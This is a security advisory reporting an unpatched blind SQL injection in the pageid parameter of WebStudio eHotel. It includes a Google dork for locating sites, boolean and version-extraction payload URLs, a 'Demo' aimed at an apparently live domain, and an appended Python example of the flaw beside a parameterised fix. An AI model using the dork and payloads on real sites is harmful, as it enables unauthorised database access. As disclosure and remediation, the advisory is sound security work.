Application:  WebStudio eHotel

Vendor Name: BDigital Media Ltd

Vendors Url:  http://www.bdigital.biz

Bug Type:     WebStudio eHotel (pageid) Blind SQL Injection Vulnerability

Exploitation: Remote

Severity: Critical

Solution Status: Unpatched 

Google Dork:  "Powered by WebStudio" eHotel

 

Description:

 

WebStudio eHotel is prone to an SQL injection vulnerability because it fails
to sufficiently sanitize user-supplied data (the pageid parameter) before using
it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying
database.

 

PoC:

 

http://localhost/index.php?pageid=50+and+1=1 ( TRUE  )

 

http://localhost/index.php?pageid=50+and+1=2 ( FALSE )

 

Exploit:

 

http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=3 ( TRUE  )

http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=4 ( FALSE )

http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=5 ( FALSE )

 

Demo:

 

http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=3 ( TRUE  )

http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=4 ( FALSE )

http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=5 ( FALSE )

 

 

Solution:

 

There was no vendor-supplied solution at the time of entry.

 

Until a vendor fix is available, edit the source code manually so that
user-supplied input such as the pageid parameter is validated before it is
used in an SQL query.
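Added illustration (not part of the original advisory or of the vendor's PHP code) of the flaw pattern beside the fix, written in Python against an in-memory SQLite table; the table name, column names and page titles are constructed, and only the 1=1 / 1=2 probes from the PoC are used.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's page table (real schema unknown)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (pageid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(50, "Rooms"), (51, "Booking")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_pageid: str):
    """Mirrors the flaw in the advisory: pageid is spliced into the SQL text,
    so 'and 1=1' / 'and 1=2' rewrite the WHERE clause and change the result."""
    sql = "SELECT title FROM pages WHERE pageid = " + raw_pageid
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn: sqlite3.Connection, raw_pageid: str):
    """Fix: allow-list pageid as a short decimal integer, then bind it as a
    parameter. Anything else is rejected before any SQL is assembled."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_pageid):
        raise ValueError("pageid must be a positive integer")
    row = conn.execute("SELECT title FROM pages WHERE pageid = ?",
                       (int(raw_pageid),)).fetchone()
    return row[0] if row else None


def probe_differential(lookup, conn: sqlite3.Connection) -> bool:
    """Blind injection depends on the TRUE and FALSE probes from the PoC
    producing different responses. Returns True when that signal exists."""
    responses = []
    for probe in ("50 and 1=1", "50 and 1=2"):
        try:
            responses.append(lookup(conn, probe))
        except ValueError:
            responses.append("rejected")      # same error for both probes
    return responses[0] != responses[1]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable differential:", probe_differential(lookup_vulnerable, db))
    print("hardened differential:  ", probe_differential(lookup_hardened, db))
```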

 

 

Credits:

 

Charalambous Glafkos

Email:  glafkos (at) astalavista (dot) com

___________________________________________

ASTALAVISTA - the hacking & security community

www.astalavista.com

www.astalavista.net

Best Regards,
Charalambous Glafkos ( nowayout )